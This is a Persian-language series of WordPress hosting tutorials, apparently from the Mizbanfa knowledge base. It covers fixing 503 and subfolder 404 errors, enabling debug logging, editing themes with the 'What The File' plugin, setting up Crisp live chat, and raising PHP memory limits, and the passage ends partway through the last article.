این نام میتونه هر اسمی باشه به جز plugins که بعد از تغییر نام به دلیل تغییر مسیر پوشه افزونه‌ها در دیتابیس وردپرس کلیه افزونه‌ها از دسترسی خارج شده و به حالت غیرفعال شده تغییر پیدا خواهند کرد و خطای 503 در وردپرس غیرفعال خواهد شد. حالا بعد از اینکه کلیه افزونه‌ها غیرفعال شدند اگر سایت را مشاهده کنید خطای 503 رفع شده است. اما برای اینکه بدونید خطا از کدوم افزونه بوده باید یک به یک هر افزونه را از پیشخوان وردپرس فعال کنید و سپس در هر بار فعال کردن سایت را بررسی کنید و ببینید بعد از فعال کردن کدوم افزونه مجددا خطای 503 نمایش داده خواهد شد تا افزونه را شناسایی و غیرفعال کنید.


2. ارور 503 وردپرس به دلیل استفاده از قالب مشکل ساز

مشکل بعدی از سمت قالب رخ خواهد داد که بخاطر خطا در کدنویسی باعث ایجاد ارور 503 در وردپرس میشود. در این روش هم شما باید قالب سایت خودتون را غیرفعال کنید که مطمئن بشید مشکل از قالب هست یا خیر. برای این منظور هم به همون روشی که برای غیرفعال کردن افزونه‌ها دیدیم باید وارد هاست شده و به مسیر /public_html/wp-content/themes در File Manager هاست مراجعه کرده و پوشه قالبی که در حال استفاده از اون هستید را انتخاب کنید.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس

سپس روی پوشه راست کلیک کرده و گزینه rename را انتخاب کنید. در پنجره باز شده به انتهای نام پوشه قالب عبارت old- یا یک عدد را اضافه کرده و ذخیره کنید. در این صورت قالب فعلی سایت غیرفعال شده و یکی از قالب‌های پیشفرض وردپرس به عنوان قالب پیشفرض انتخاب خواهد شد.

استفاده از قالب پیشفرض وردپرس

بعد از غیرفعال کردن قالب سایت یکی از قالب‌های پیشفرض وردپرس انتخاب شده و فعال خواهند شد که در این صورت خواهید دید خطای 503 در وردپرس رفع شده است. اما در صورتی که خطا برطرف نشد باید از روش‌های بعدی برای رفع خطا استفاده کنید.

همچنین توجه کنید، در صورتی که از قالب‌های پیشفرض وردپرس استفاده نمی‌کنید وردپرس را از fa.wordpress.org دانلود کرده و یکی از قالب‌های موجود داخل پوشه wp-content/themes را به حالت فشرده zip تبدیل کنید. سپس با استفاده از آموزش نصب قالب در وردپرس که مفصلا توضیح داده شده فایل zip قالب را در مسیر /public_html/wp-content/themes/ قرار دهید. در نهایت روی فایل zip راست کلیک کرده و گزینه Extract را انتخاب کنید تا از حالت فشرده خارج شده و در وردپرس نصب شود.

3. خطا 503 وردپرس به دلیل ناسازگاری در کدهای PHP

گاهی اوقات هم پیش میاد که خطای php باعث ایجاد ارور 503 در وردپرس خواهد شد که مشخص هم نیست که خطای php رخ داده در افزونه، قالب یا هسته وردپرس بوده است. برای اینکه بدونید دلیل این کار از کجا بوده دو راهکار وجود داره که در روش اول باید بر اساس توضیحاتی که برای فایل error_log در روش اول گفتم فایل ارور لاگ هاست را بررسی کنید و ببینید که مشکل از کجاست و اونو برطرف کنید.

فعال کردن حالت دیباگ وردپرس

اما روش دیگری که وجود داره و با استفاده از اون میتونید بهتر متوجه خطای php در هاست شوید استفاده از دیباگ وردپرس هست. با استفاده از دیباگ وردپرس میتونید خطاهایی که در فایل‌های قالب و افزونه وردپرس وجود داره را مشاهده کرده و برطرف کنید. برای این منظور باید قطعه کدی را در فایل کانفیک وردپرس wp-config.php قرار بدین تا حالت دیباگ فعال بشه. برای این منظور وارد هاست شده و روی file manager کلیک کنید. سپس به مسیر public_html مراجعه کرده و فایل wp-config.php را انتخاب کنید. حالا برای ویرایش این فایل در هاست سی پنل روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید. سپس کدهای زیر را در بخش define این فایل یعنی بالاتر از خط /*That’s all, stop editing! Happy blogging.*/ قرار داده و ذخیره کنید.

define ('WP_DEBUG', true);

اگر از قبل این کد در فایل قرار داره اما مقدار اون به جای true روی false قرار داره باید اونو به حالت true قرار بدین تا حالت دیباگ در وردپرس فعال بشه. برای اینکه نتیجه بهتری دریافت کنید، درست در زیر این خط کدهای زیر را هم قرار بدین.

define ('WP_DEBUG_LOG', true);
define ('WP_DEBUG_DISPLAY', false);
@ini_set ('display_errors', 0);

به دلیل اینکه امکان دسترسی به پیشخوان وردپرس و خود سایت در حالتی که با خطای 503 در وردپرس مواجه شدید وجود نداره صرفا با فعال کرده دیباگ هیچ خطایی به شما نمایش داده نخواهد شد. بنابراین باید حالت‌های WP_DEBUG_LOG، WP_DEBUG_DISPLAY و ثابت‌های @ini_set را هم فعال کنید.

بعد از ذخیره فایل یک بار سایت خودتون را ریلود کنید. حالا به مسیر /public_html/wp-content/ مراجعه کنید. فایلی با نام debug.log در این پوشه اضافه میشه که با بررسی خطاهای موجود در این فایل میتونید بدونید مشکل ارور 503 در وردپرس به چه دلیلی هست. این فایل کلیه خطاهای موجود در سایت را در خودش ذخیره میکنه که میتونید به راحتی با بررسی منشا مشکل را پیدا کنید.


4. خطای 503 به دلیل مشکلات سرور

یکی دیگه از دلایل بروز خطای 503 در وردپرس از سمت سرور هست که به دلیل به‌روزرسانی نرم افزارهای مورد نیاز سرور و تغییرات در کانفیگ سرور ایجاد می‌شوند. از اونجایی که دسترسی به سرور معمولا براتون وجود نداره بنابراین باید منتظر بمونید و با اطمینان به میزبانی وب خودتون فرصت بدین تا با صبر و حوصله کار را به اتمام برسونند و مشکل سایت شما هم برطرف بشه. در صورتی که با استفاده از روش‌های سه گانه فوق موفق نشدید خطا را برطرف کنید باید بدونید که مشکل از سرور هست که با کمی منتظر موندن رفع خواهد شد.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرسرفع مشکل مصرف بیش از حد منابع هاست

گاهی هم پیش میاد که به دلیل بازدید بالا یا خطاهای مربوط به کدنویسی هاست شما از منابع زیادی مصرف میکنه که در صورت عدم رفع مشکل به روش‌های سه گانه فوق باید وارد هاست شده و مشابه تصویر زیر از بخش STATISTICS بررسی کرده و ببینید که میزان مصرف از منابع هاست در چه سطحی قرار دارد.

همونطور که در تصویر میبینید در اینجا میزان مصرف از منابع هاست که شامل مصرفت میزان CPU، مصرف میزان رم، تعداد درخواست‌های همزمان، تعداد حداکثر افراد که میتونند همزمان در سایت آنلاین باشند و… نمایش داده خواهند شد که با قرار گرفتن در سطح بالا و مصرف بیش از حد به صورت قرمز رنگ نمایش داده می‌شوند که باید آنها را بررسی کرده و رفع کنید.

برای رفع این مشکل میتونید از مقاله آموزش رفع مشکل استفاده زیاد از منابع CPU در وردپرس استفاده کنید که مفصلا در مورد این موضوع و نحوه کاهش مصرف منابع هاست پرداخته شده است.

محدود کردن دسترسی گوگل وبمستر در crawl کردن سایت

برای ایندکس سایت شما در گوگل خزنده‌های گوگل که اونها را با عنوان crawler ها می‌شناسیم درست مثل یک بازدیدکننده وارد سایت شده و کلیه صفحات را برای ایندکس صفحات جدید بررسی می‌کنند که در مقاله آموزش معرفی سایت وردپرسی به گوگل به این موضوع پرداختم. حالا گاهی پیش میاد که به دلیل تعداد درخواست بالا همین مسئله باعث بالا رفتن منابع در هاست خواهد شد که میتونید از طریق گوگل وبمستر این مورد را کم کنید.

توجه داشته باشید که تغییرات اعمال شده در این بخش برای اینکه در کل سایت ایجاد بشه ممکنه تا 3 ماه طول بکشه که در صورت استفاده از www در وردپرس باید این گزینه را در هر دو حالت روی یک میزان تنظیم کنید. علاوه بر این صرفا این گزینه را فقط در حالتی تغییر بدین که فکر می‌کنید منابع هاست شما بیش از حد مصرف می شوند. چرا که در صورت کم کردن زیاد این مقدار به منظور رفع ارور 503 وردپرس ایندکس سایت به دلیل بالا رفتن بازه زمانی برای بررسی مطالب جدید از سوی گوگل کندتر خواهد شد.

برای این منظور باید وارد گوگل وبمستر خود شده و مشابه تصویر زیر ابتدا چرخ دنده را انتخاب کرده و گزینه site options را انتخاب کنید.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس

 

بعد از این مرحله صفحه زیر براتون باز میشه که باید در بخش crawl rate ابتدا گزینه Let Google’s maximum crawl rate را انتخاب کرده و سپس با استفاده از نوار کشیدنی این مقدار را به سمت چپ یعنی low بکشید.

نحوه رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس

در مقابل تعداد درخواست بررسی در هر ثانیه به همراه بازه زمانی بین بررسی هر درخواست نمایش داده خواهد شد که در نهایت بعد از انتخاب میزان دلخواه روی دکمه save کلیک کنید تا تنظیمات ذخیره شوند.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید اقدام به رفع ارور 503 در وردپرس و حل مشکل http error 503 ورپرس بکنید. در صورتی که با استفاده از روش‌های گفته شده در این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش نحوه رفع خطای 503 در وردپرس اولین بار در پدیدار شد.

آموزش ویرایش قالب وردپرس

$
0
0

ویرایش قالب وردپرس و شخصی سازی قالب در وردپرس همواره یکی از مشکلاتی بوده که کاربران تازه وارد در حال دست و پنجه نرم کردن با اون هستند. همونطور که میدونید در یک قالب وردپرس برای اینکه سایت شما با اون ظاهر زیبایی که داره نمایش داده بشه چندین فایل مختلف در پوشه قالب وجود دارند که با استفاده از زبان‌های php، css، js و… نوشته شدند و در نهایت قالب سایت وردپرسی شما را تشکیل می‌دهند. اما در بیشتر موارد کاربران قصد دارند تا قالب خودشون را سفارشی کرده و از فونت دلخواه، فونت آیکون و یا ایجاد تغییرات در بخش‌های مختلف استفاده کنند. در این صورت به دلیل نداشتن دانش کافی به بن بست خورده و کاملا از این کار منصرف می‌شوند. اما هستند کاربرانی که همچنان امید دارند و سعی می‌کنند با جستجو در اینترنت برای چگونه قالب وردپرس را ویرایش کنیم برای رسیدن به هدف خودشون تلاش می‌کنند.

در این آموزش از پایگاه دانش میزبان‌فا قصد معرفی افزونه ویرایش قالب وردپرس را دارم که با استفاده از این افزونه میتونید امکانی فراهم کرده و سریعا فایل مربوط به هر بخش از قالب را پیدا کنید. پس اگر شما هم برای ویرایش قالب وردپرسی خودتون دچار مشکل شدید و نتونستید فایل مربوط به قالب را پیدا کنید تا انتهای این آموزش همراه ما باشید.

آموزش ویرایش قالب وردپرس

مشکل عمده کاربران تازه کار در ویرایش قالب این هست که مجبور هستند کل فایل‌های قالب را برای پیدا کردن بخش مورد نظر زیر و رو کنند و بعد اونو ویرایش کنند. برای همین پیدا کردن در بین تعداد زیادی فایل که نویسنده ممکنه اون قطعه کد را در هر فایل و پوشه‌ای قرار داده باشه دچار سردرگمی خواهند شد. کاری که این افزونه انجام میده اینه که در هر صفحه از سایت که قرار داشته باشید فایل‌های فراخوانی شده مربوط به صفحه را به شما نمایش میده و میتونید فایلی که باید ویرایش کنید را سریع‌تر پیدا کنید.

افزونه ویرایش قالب وردپرس که قصد معرفی اونو دارم با نام What The File در مخزن وردپرس به ثبت رسیده و تاکنون موفق شده بیش از 40.000 نصب فعال و کسب امتیاز 4.9 را ازآن خودش بکنه که با استفاده از این افزونه میتونید به راحتی امکان ویرایش قالب وردپرس را در سایت خودتون فراهم کنید. برای استفاده از این افزونه لازمه ابتدا روی لینک زیر کلیک کنید تا به صفحه افزونه در مخزن وردپرس هدایت شده و سپس با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال سازی افزونه در سایت وردپرسی خودتون بکنید.

دانلود افزونه What The File

بعد از نصب و فعال سازی افزونه منو یا تنظیمات خاصی به پیشخوان سایت وردپرسی شما اضافه نخواهد شد و نیازی به انجام تنظیمات خاصی ندارید. فقط باید هر بخش از سایت را که قصد دارید ویرایش کنید را به آن صفحه مراجعه کنید. به عنوان مثال اگه قصد دارید استایل مربوط به برچسب نوشته در وردپرس که در انتهای مطالب نشون داده میشه را ویرایش و شخصی سازی کنید باید به صفحه یکی از نوشته‌ها مراجعه کنید.

ویرایش قالب وردپرس با افزونه ویرایش قالب وردپرس

حالا همونطور که در تصویر میبینید در نوار ابزار گزینه‌ای با نام What The File اضافه شده که با بردن نشانگر ماوس روی این گزینه زیر منوهایی باز میشه که در اون کلیه فایل‌ها و پوشه‌هایی که برای این صفحه ازشون لودی صورت میگیره را به شما نمایش خواهد داد. در نمونه فوق تصویر مربوط به صفحه نوشته هست، همونطور که میبینید برای قالب صفحه تک نوشته در اینجا از دو فایل single.php و content.php که داخل پوشه Template Parts قرار داره استفاده شده است.

بعد از اینکه فایل‌ها مشخص شد میتونید با کلیک روی فایل به صفحه ویرایش فایل با استفاده از ویرایشگر وردپرس هدایت شوید. اما توجه کنید در صورتی که بنا به چیزی که در مقاله آموزش تامین امنیت وردپرس و جلوگیری از هک وردپرس گفتم اگر ویرایشگر قالب وردپرس را غیرفعال کرده باشید به این صفحه نمیتونید دسترسی پیدا کنید.

بنابراین برای ویرایش فایل قالب وردپرس از طریق هاست یا اکانت FTP باید به مسیر /public_html/wp-content/themes/ در File Manager هاست مراجعه کرده و سپس وارد پوشه قالبی که در حال استفاده از اون هستید بشید. در نهایت با استفاده از شناسایی افزونه میتونید بر اساس پوشه‌های داخل قالب به دنبال فایل مربوطه بگردید و به راحتی قالب وردپرس را شخصی سازی کنید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش و افزونه معرفی شده بتونید به راحتی اقدام به ویرایش قالب وردپرس در سایت خودتون بکنید. در صورتی که هر سوالی درباره این آموزش و نحوه ویرایش قالب وردپرس و شخصی سازی قالب در وردپرس داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش ویرایش قالب وردپرس اولین بار در پدیدار شد.

آموزش ساخت چت آنلاین در وردپرس

$
0
0

ساخت سیستم چت آنلاین وردپرس این قابلیت را در اختیار سایتتون قرار میده تا هر زمان بازدیدکننده‌ای وارد سایت میشه و درباره محصولات و خدماتی که ارائه میدید قبل از خرید هر سوالی که داره را از شما بپرسه. افزونه چت آنلاین وردپرس به این صورت هست که هر زمان در دسترس و آنلاین باشید دکمه چت در وردپرس برای کاربر نمایش داده میشه و کاربران قادر هستند بعد از کلیک روی آیکون چت پیغام خودشون را ارسال کنند و از قابلیت چت در سایت استفاده کنند. استفاده از چت آنلاین در وردپرس یک نیاز اساسی هست که اگر اونو راه‌اندازی کنید میتونه تاثیر بسیار خوبی روی فروش محصولات شما داشته باشه.

در این مقاله از پایگاه دانش میزبان‌فا قصد معرفی سیستم چت آنلاین در وردپرس با استفاده از سایت crisp را دارم به تا به امروز جزو برترین سیستم‌های چت آنلاین در وردپرس به حساب میاد و اگر دنبال بهترین افزونه چت آنلاین وردپرس هستید پیشنهاد می‌کنم حتما از این سایت برای پشتیبانی آنلاین استفاده کنید. البته سیستم‌های بهتری هم وجود دارند اما چون رایگان نیستند و هزینه استفاده از اونها که بر اساس دلار هست زیاد میشه توجیه اقتصادی ندارند که از نسخه‌های تجاری استفاده کنیم.

آموزش ساخت سیستم چت آنلاین وردپرس

ابتدا به آدرس crisp.chat مراجعه کرده و ثبت نام کنید. برای عضویت در سایت مشابه تصویر زیر روی دکمه USE CRISP FOR FREE کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

با کلیک روی این دکمه به صفحه عضویت در سایت هدایت خواهید شد. همونطور که در تصویر زیر میبینید اطلاعات خودتون را در صفحه عضویت که شامل ایمیل، رمز انتخابی، نام و نام خانوادگی هست را وارد کرده و در نهایت روی دکمه Continue کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از این مرحله وارد صفحه زیر میشید که باید آدرس دامنه‌ای که قصد استفاده از crisp را برای پشتیبانی آنلاین وردپرس دارید به همراه نام سایت وارد کنید. بنابراین مشابه تصویر زیر آدرس دامنه و نام سایت خودتون را وارد کرده و در نهایت روی دکمه Continue کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

در مرحله آخر که ثبت نام انجام میشه با تصویر زیر روبه‌رو خواهید شد.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

به شما اعلام میشه تا 14 روز میتونید از کلیه قابلیت‌های این سایت برای پشتیبانی آنلاین در وردپرس استفاده کنید. اما زمانی که 14 روز گذشت برای حفظ کلیه امکانات باید نسخه pro را خریداری کنید. در غیر این صورت اکانت به حالت رایگان تغییر پیدا خواهد کرد که امکانات نسخه رایگان محدودتر خواهند بود.

روی دکمه Okay, Finalize کلیک کنید تا به صفحه زیر هدایت شده و در نهایت دکمه Discover My Dashboard را انتخاب کنید تا به داشبورد سایت crisp هدایت شوید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از اینکه وارد داشبورد شدید پنجره زیر براتون نمایش داده میشه و از اونجایی که ما از وردپرس استفاده می‌کنیم بنابراین روی دکمه WordPress کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از کلیک روی وردپرس پنجره زیر نمایش داده میشه و از شما میخواد که به مخزن وردپرس مراجعه کرده و افزونه رسمی را برای استفاده از پشتیبانی آنلاین در وردپرس نصب و فعال کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

آموزش افزونه چت وردپرس با استفاده از Crisp

افزونه چت آنلاین در وردپرس با نام crisp در مخزن وردپرس به ثبت رسیده و تاکنون موفق شده بیش از 8.000 نصب فعال و کسب امتیاز 4.8 را ازآن خودش بکنه که با استفاده از این افزونه میتونید دکمه چت آنلاین را در سایت وردپرسی خودتون نمایش بدین. برای استفاده از این افزونه روی دکمه زیر کلیک کنید تا به صفحه افزونه در مخزن وردپرس هدایت شده و سپس با استفاده از آموزش نحوه نصب و کار کردن با افزونه ها در وردپرس اقدام به نصب و فعال سازی افزونه در وردپرس بکنید.

دانلود افزونه Crisp Live Chat

بعد از نصب و فعال سازی افزونه مشابه تصویر زیر منویی با نام Crisp Settings در پیشخوان وردپرس افزوده خواهد شد. حالا برای اینکه اتصال بین سایت crisp و وردپرس برقرار بشه روی دکمه Connect With Crisp کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از کلیک روی دکمه به سایت crisp هدایت میشید که باید ایجاد ارتباط بین سایت وردپرس و کریسپ را تایید کنید. بنابراین مشابه تصویر زیر روی دکمه Continue کلیک کرده و منتظر بمونید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از کلیک روی این گزینه ارتباط بین وردپرس و سایت crisp برقرار میشه و به صفحه تنظیات افزونه در سایت وردپرسی خودتون برمیگردید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

بعد از این مرحله اگر سایت خودتون را باز کنید میبینید که دکمه پشتیبانی آنلاین در وردپرس برای کاربران نمایش داده میشه و امکان چت در اون برقرار خواهد بود. بنابراین برای اینکه بتونید پاسخ کاربران را بدین باید روی دکمه آبی رنگ Go my inbox کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

همونطور که در تصویر میبینید بازدید کننده میتونه پیغام خودش را نوشته و برای شما ارسال بکنه. حالا به محض رسیدن پیام برای سیستم پشتیبانی شما مشابه تصویر زیر جزییات کاملی از چت به همراه اطلاعات کاربر نمایش داده شده و درست مثل برنامه‌های پیام رسان قادر به پاسخ دادن خواهید بود.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

مشابه تصویر بالا میتونید اطلاعات هر بازدید کننده را مشاهده کرده و از امکاناتی که شامل موارد زیر هستند استفاده کنید.

  • مرورگر کاربر و سیستم عامل مورد استفاده
  • آی‌پی کاربر
  • مشاهده پیغام در حالت پیش نویس که بازدیدکننده در حال تایپ آن است
  • موقعیت مکانی کاربر
  • صفحاتی که کاربر از آنها بازدید کرده است
  • تعیین چت به عنوان حل شده
  • افزودن یادآوری برای هر چت
  • افزودن یادداشت به هر چت(برای بازدیدکننده قابل مشاهده نیست)
  • امکان بلاک بازدیدکننده برای عدم ایجاد چت
  • مشاهده ایمیل بازدید کننده در صورت ارسال
  • و…

منوهایی که در پنل کاربری نمایش داده می‌شوند شامل موارد زیر هستند.

  1. Inbox: با کلیک روی این گزینه میتونید پیغام‌های ورودی بازدیدکننده‌هایی که براتون پیام ارسال کردن را مشاهده و با آنها چت کنید.
  2. Visitor: با استفاده از این قسمت میتونید بازدیدکنندگان حاضر در سایت را به همراه آی‌پی و موقعیت مکانی اونها مشاهده کرده و شروع گفتگو با کاربر را خودتون انجام بدین.
  3. users: در این بخش میتونید لیست کسانی که در سایت باهاتون چت کردند را مشاهده کنید.
  4. Analytics: این گزینه برای آنالیز و بررسی آمار به صورت روزانه، هفتگی، ماهانه و یا زمان دلخواه هست که در نسخه رایگان استفاده از اون وجود نداره.
  5. Setting: این بخش هم شامل تنظیمات اکانت و شخصی سازی هست که با استفاده از اون میتونید تنظیمات دلخواه و سفارشی را برای چت با کاربران در وردپرس اعمال کنید.

فارسی کردن Crisp

یکی از سوالات متداول کاربران برای این افزونه فارسی سازی آن است. در صورتی که پشتیبانی انلاین در وردپرس با زبان انگلیسی نشون داده میشه برای فارسی سازی باید مراحل زیر را طی کنید. ابتدا در بخش کاربری سایت crisp روی گزینه چرخ دنده کلیک کنید و سپس از بین لیست گزینه Website Settings را انتخاب کنید تا صفحه زیر براتون باز بشه.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

همونطور که در تصویر میبینید روی دکمه Settings کلیک کنید تا به صفحه تنظیمات هدایت شوید. سپس مشابه تصویر زیر روی تب Chatboxs & Emails Settings کلیک کنید. حالا روی گزینه open options که در مقابل chatbox appearance قرار داره کلیک کنید.

ساخت چت آنلاین وردپرس با بهترین افزونه چت آنلاین وردپرس

در نهایت از بخش Chatbox language زبان دلخواه خودتون را انتخاب کنید. در حالت پیشفرض زبان بر اساس آی‌پی بازدیدکننده و موقعیت مکانی که توسط سایت شناسایی میشه خواهد بود که لازمه این گزینه را در صورت نیاز به فارسی تغییر دهید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید امکان چت آنلاین در وردپرس و پشتیبانی به صورت آنلاین را در سایت وردپرسی فراهم کنید و با پاسخ دادن به مشتریان سایت، در جهت افزایش فروش خدمات و محصولات خودتون حرکتی رو به جلو داشته باشید. در صورتی که درباره این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

 

نوشته آموزش ساخت چت آنلاین در وردپرس اولین بار در پدیدار شد.


آموزش رفع خطای 404 ساب فولدر وردپرس

$
0
0

خطای 404 ساب فولدر وردپرس گاهی برای کاربران پیش میاد که دلیل این موضوع بر میگرده به فایل htaccess. که بر اساس کانفیگ سرور و هاست باعث بروز این خطا در سایت خواهید شد. همونطور که در مقاله آموزش نصب وردپرس روی ساب دامین توضیح دادم و کارهای نصب وردپرس را در فولدر جدا یا ساب دامنه انجام دادیم، سایت ما جدا از دامنه اصلی از طریق پوشه یا ساب دامنه در دسترس خواهد بود. به عنوان مثال اگر داخل هاستتون یک پوشه با نام mizbanfa ایجاد کنید و طبق آموزش وردپرس را در این پوشه نصب کنید وردپرس شما با مراجعه به آدرس site.com/mizbanfa در دسترس خواهد بود. اما گاهی پیش میاد که به دلیل تغییراتی در فایل پیشفرض htaccess. با خطای 404 مواجه خواهید شد.

در این مقاله از پایگاه دانش میزبان‌فا قصد دارم به معرفی نحوه رفع خطای 404 بعد از نصب وردپرس در ساب فولدر یا ساب دامنه بپردازم که با استفاده از این آموزش اگر هنگام نصب وردپرس در ساب فولدر با خطای 404 مواجه شدید بتونید به راحتی اونو برطرف کنید.

آموزش رفع خطای 404 ساب فولدر وردپرس

مشکل صفحه 404 در ساب فولدر وردپرس معمولا بعد از تغییر پیوند یکتا در وردپرس پیش میاد. دلیل اون هم به این بر میگرده که ممکنه به دلیل ساختار فایل htaccess. که در روت هاست قرار داره یک درگیری با تابع permalink پیش بیاد و منجر به این مسئله بشه که قاعدتا برای رفع این مشکل باید از طریق فایل htaccess. اقدام کنید. در حالت پیشفرض فایل htaccess. وردپرس به صورت زیر هست.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

حالا وقتی این اختلال بین دو فایل htaccess. که در روت هاست و پوشه ساب فولدر قرار داره ایجاد میشه باعث میشه که دامنه اصلی بالا بیاد و چون پیوند یکتا مطالب وردپرس به صورت سفارشی هستند با خطای 404 در دامنه اصلی مواجه شوید. برای رفع این مشکل باید فایل htaccess. موجود در پوشه را به ساختار جدید تغییر دهید.

برای این منظور وارد هاست خود شده و روی گزینه File Manager کلیک کنید تا به صفحه مدیریت فایل در هاست هدایت شوید. سپس وارد پوشه‌ای که وردپرس را در آن نصب کرده‌اید شده و به دنبال فایل htaccess. بگردید. همونطور که از نقطه اول نام این فایل مشخص هست جزو فایل‌های مخفی هاست خواهد بود. بنابراین اگر فایل را پیدا نکردید روی دکمه Settings که در بالای صفحه قرار داره کلیک کرده و سپس مشابه تصویر زیر تیک گزینه Show Hidden Files را فعال کرده و روی دکمه save کلیک کنید.

نحوه رفع خطای 404 هنگام نصب وردپرس در ساب فولدر یا ساب دایرکتوری

حالا روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید تا به صفحه ویرایش فایل htaccess. هدایت شده و کدهای زیر را با محتوای کدهای فعلی جایگزین کنید.

در صورتی که در هاست خودتون فایل htaccess. را پیدا نکردید و وجود نداشت کافیه با استفاده از برنامه‌های ویرایشگر متن مثل notepad یک فایل با نام htaccess. بسازید. یا اینکه در همین مسیر پوشه روی گزینه New File کلیک کرده و یک فایل با همین نام ایجاد کنید.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /subdirectory/
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /mizbanfa/index.php [L]
</IfModule>
# END WordPress

حالا کافیه به جای عبارت mizbanfa که در خط هشتم این کد قرار داره نام پوشه خودتون را وارد کرده و فایل را ذخیره کنید تا خطای 404 در وردپرس برای ساب فولدر رفع شود.
امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید اقدام به رفع خطای 404 در هنگام نصب وردپرس در ساب فولدر بکنید. در صورتی که در رابطه با این آموزش و نحوه رفع مشکل 404 در وردپرس سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش رفع خطای 404 ساب فولدر وردپرس اولین بار در پدیدار شد.

آموزش افزایش محدودیت حافظه php در وردپرس

$
0
0

همونطور که میدونید سیستم مدیریت محتوای وردپرس بر اساس زبان برنامه نویسی PHP ساخته شده است. حالا در این زبان برنامه نویسی که سمت سرور هست برای اجرای دستورات و کارهایی که قراره روی سایت صورت بگیره نیاز به حافظه‌ای برای ذخیره و اجرای صحیح دستورات داریم. برای همین دلیل میزبانی‌های وب یک میزان خاصی را برای این حافظه در نظر می‌گیرند که معمولا 128 یا 256 هست. حالا برای وردپرس حالتی که پیش میاد اینه که اگر این میزان حافظه کمتر از 64 مگابایت باشه، وردپرس به صورت خودکار سعی میکنه تا این محدودیت حافظه PHP را افزایش بده که در صورت پایین پودن این میزان خطایی به شکل زیر در سایت نمایش داده خواهد شد.

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2348617 bytes) in /home/xxx/public_html/wp-includes/plugin.php on line xxx

حالا اگر با این خطا مواجه شدید باید میزان محدودیت حافظه PHP را در وردپرس افزایش بدین تا خطا برطرف شده و سایت شما قادر باشه تا در حافظه تخصیص داده شده به درستی کار بکنه. در این مقاله از پایگاه دانش میزبان‌فا به نحوه رفع محدودیت حافظه php در وردپرس با استفاده از روش‌های گوناگون می‌پردازم که میتونید بر اساس دسترسی‌هایی که دارید این محدودیت را بردارید.

آموزش افزایش محدودیت حافظه php در وردپرس

دلیل مواجه شدن با محدودیت حافظه php در وردپرس میتونه به خاطر استفاده بیش از حد افزونه‌ها یا قالب وردپرس از حافظه تخصیص داده شده در هاست باشه که در مقاله آموزش رفع مشکل استفاده زیاد از منابع CPU در وردپرس اشاره‌ای به این مورد داشتم. در این صورت با خطایی که در بالا اشاره شد مواجه خواهید شد و یا اینکه پیغام Internal Server Error در وبسایت شما نمایش داده می‌شود.

افزایش محدودیت حافظه php در وردپرس و از بین بردن محدودیت آپلود در وردپرس

در صورتی که با خطای Internal Server Error یا fatal error هنگام ورود به پیشخوان وردپرس مواجه شدید میتونید با استفاده از فایل htaccess. این مشکل را به راحتی برطرف کنید. برای این منظور وارد هاست خودتون شده و روی گزینه File Manager کلیک کنید تا به صفحه مدیریت فایل‌ها در هاست هدایت شوید. سپس به مسیر public_html مراجعه کرده و به دنبال فایل htaccess. بگردید و بعد از راست کلیک کردن روی فایل گزینه Edit را انتخاب کنید. در صورتی که این فایل به شما نمایش داده نشد روی دکمه Settings کلیک کرده و سپس در پنجره باز شده مثل تصویر زیر گزینه show hidden files را انتخاب کنید. در نهایت دکمه save را انتخاب کنید تا تنظیمات اعمال شود.

افزایش محدودیت حافظه php در وردپرس و از بین بردن محدودیت آپلود در وردپرس

